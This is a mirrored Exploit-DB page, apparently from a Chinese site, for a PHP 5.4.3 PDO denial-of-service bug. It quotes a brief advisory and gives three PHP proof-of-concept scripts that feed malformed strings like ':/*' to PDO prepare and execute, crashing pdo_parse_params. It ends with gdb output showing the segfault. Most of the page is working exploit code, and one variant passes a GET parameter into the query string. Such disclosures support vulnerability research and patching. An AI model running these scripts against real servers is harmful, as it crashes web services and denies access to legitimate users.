PHP 5.4.3 – PDO Memory Access Violation Denial of Service - 体验盒子

作者： 0x721427D8

日期： 2012-08-02

类别：

dos

平台：

php

来源：https://www.exploit-db.com/exploits/37566/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

source: https://www.securityfocus.com/bid/54777/info

PHP is prone to a remote denial-of-service vulnerability.

An attacker can exploit this issue to cause the web server to crash, denying service to legitimate users.

PHP 5.4.3 is vulnerable; other versions may also be affected.

<?php

try {

$db = new PDO('mysql:host=localhost;dbname=aws', "root", "");

//tokens:

// SELECT;*;from;'user';/*

//$sql = "SELECT * from 'user'/*";

$stmt = $db->prepare("SELECT * from 'user'".mysql_real_escape_string($_GET['query']));

$stmt->execute();

//crash

$stmt->bindColumn(2, $type, PDO::PARAM_STR, 256);

$stmt->fetch(PDO::FETCH_BOUND);

print_r( $type);

}

catch (Exception $e)

{

echo "Failed: " . $e->getMessage();

}

?>

-----

<?php

try {

$db = new PDO('mysql:host=localhost;dbname=aws', "root", "");

//tokens:

// SELECT;*;from;'user';/*

$sql = ":/*";

$stmt = $db->prepare($sql);

$stmt->execute(); // crashes php worker in pdo_parse_params()

$stmt->bindColumn(2, $type, PDO::PARAM_STR, 256);

$stmt->fetch(PDO::FETCH_BOUND);

print_r( $type);

} catch (Exception $e) {

echo "Failed: " . $e->getMessage();

}

?>

---

<pre>

<?php

echo "hmm beginning\n";

try {

$db = new PDO('mysql:host=localhost;dbname=aws', "root", "");

echo "lets get it on\n";

//tokens:

// SELECT;*;from;'user';/*

$sql = "SELECT * from user :/**";

echo $sql;

$stmt = $db->prepare($sql);

echo "prepared :)\n";

print_r($stmt);

$stmt->execute(); // crashes php worker in pdo_parse_params()

print_r($stmt);

echo "executed :(\n";

$stmt->bindColumn(2, $type, PDO::PARAM_STR, 256);

$stmt->fetch(PDO::FETCH_BOUND);

echo "--data-\n";

print_r( $type);

echo "--data--\n";

} catch (Exception $e) {

echo "EXCEPTION";

echo "Failed: " . $e->getMessage();

}

echo "hmmm end\n";

?>

</pre>

Actual result:

--------------

root@bt:/opt/lampp# gdb ./bin/php

(gdb) run poc_pdo_linux_short_1.php

Starting program: /opt/lampp/bin/php /opt/lampp/poc_pdo_linux_short_1.php

[Thread debugging using libthread_db enabled]

Program received signal SIGSEGV, Segmentation fault.

0x08228a81 in ?? ()

(gdb) bt

#00x08228a81 in ?? ()

#10x082280eb in pdo_parse_params ()

#20x08223891 in ?? ()

#30x084b2aad in ?? ()

#40x084b1f87 in execute ()

#50x08490ed2 in zend_execute_scripts ()

#60x0843f13c in php_execute_script ()

#70x08506b46 in main ()